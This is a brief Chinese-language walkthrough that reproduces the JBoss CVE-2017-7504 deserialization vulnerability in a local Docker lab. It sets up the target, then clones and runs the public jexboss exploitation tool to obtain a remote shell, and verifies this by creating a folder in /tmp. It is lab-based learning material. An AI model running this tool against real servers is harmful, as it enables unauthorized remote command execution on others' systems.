前言
环境搭建
cd /jboss/CVE-2017-7504
docker-compose up -d
访问http://ip:8080 ,可以看到web页面
点击jmx console后,这里我就和网上复现的不一样了,我出现了如下图所示,需要输入登录验证。
我觉得这个问题应该是靶场的原因,然而安恒红皮书的也是用的这个靶场,但是不影响下面的漏洞利用。
漏洞验证
git clone https://github.com/joaomatosf/jexboss # 下载漏洞利用工具
cd jexboss
python3 jexboss.py -host http://ip:8080/
将会自动检测是否可利用,当可利用时出现VULNERABLE
输入yes后,进入shell模式,这时候在tmp目录下尝试创建一个test文件夹
使用docker exec -it 容器id /bin/bash
进入docker,发现成功创建了test文件夹